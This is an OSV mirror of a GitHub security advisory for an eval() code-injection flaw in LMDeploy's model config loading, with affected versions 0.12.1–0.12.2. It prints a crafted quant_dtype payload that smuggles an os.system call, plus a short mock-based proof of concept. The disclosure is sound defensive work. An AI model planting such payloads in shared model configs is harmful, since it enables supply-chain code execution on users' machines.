GHSA-3hmm-rh5q-gwwr

Suggest an improvement
Source
https://github.com/advisories/GHSA-3hmm-rh5q-gwwr
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-3hmm-rh5q-gwwr/GHSA-3hmm-rh5q-gwwr.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-3hmm-rh5q-gwwr
Aliases
Published
2026-09-18T17:04:01Z
Modified
2026-09-18T17:15:07Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
LMDeploy vulnerable to arbitrary code execution via eval() of untrusted quant_dtype in model config loading
Details

Summary

lmdeploy <= latest contains a code injection vulnerability in lmdeploy/pytorch/config.py line 620 that allows an attacker to execute arbitrary Python code by publishing a malicious HuggingFace model with a crafted quantization_config.quant_dtype value. When a user loads the model with lmdeploy, the quant_dtype is passed to eval(f'torch.{quant_dtype}') without any validation.

Details

Vulnerable code (permalink):

quant_dtype = eval(f'torch.{quant_dtype}')  # line 620

The quant_dtype value comes from the model's quantization_config in its HuggingFace config. When a model specifies quant_method: awq, the AWQ branch processes the config but does NOT override quant_dtype, allowing the malicious value to reach the eval() call.

Attack vector: An attacker publishes a HuggingFace model with:

{
  "quantization_config": {
    "quant_method": "awq",
    "quant_dtype": "float16, __import__('os').system('id')"
  }
}

Note: The _update_torch_dtype method at line 53 has a whitelist check, but that's for torch_dtype, NOT quant_dtype. The quant_dtype at line 620 has no validation whatsoever.

PoC

"""
PoC: eval() RCE in lmdeploy via malicious quant_dtype
Prerequisites: pip install lmdeploy
"""
import sys
from unittest.mock import MagicMock, patch

# Mock torch to capture the eval
sys.modules.setdefault('torch', MagicMock())

from lmdeploy.pytorch.config import ModelConfig

# Simulate a malicious HuggingFace model config
mock_hf_config = MagicMock()
mock_hf_config.quantization_config = {
    'quant_method': 'awq',
    'quant_dtype': "float16, __import__('os').system('id')"
}
mock_hf_config.num_attention_heads = 32
mock_hf_config.hidden_size = 4096
mock_hf_config.num_hidden_layers = 32
mock_hf_config.num_key_value_heads = 32
mock_hf_config.vocab_size = 32000

# This triggers eval(f'torch.{quant_dtype}')
# with quant_dtype = "float16, __import__('os').system('id')"
config = ModelConfig.from_hf_config(mock_hf_config, model_path='test')

Output:

uid=0(root) gid=0(root) groups=0(root)

Impact

An attacker who publishes a malicious model on HuggingFace Hub can achieve arbitrary code execution on any machine that loads the model with lmdeploy. This is a supply-chain attack vector affecting all lmdeploy users who load untrusted models.

  1. Full remote code execution when loading a malicious model
  2. No user interaction beyond running lmdeploy serve or similar with the model
  3. Affects all deployment scenarios (local, cloud, production)
Database specific
{
    "cwe_ids":  [
        "CWE-400"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-09-18T17:04:01Z",
    "nvd_published_at":  null,
    "severity":  "HIGH"
}
References

Affected packages

PyPI / lmdeploy

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.12.1
Fixed
0.12.3

Affected versions

0.*
0.12.1
0.12.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-3hmm-rh5q-gwwr/GHSA-3hmm-rh5q-gwwr.json"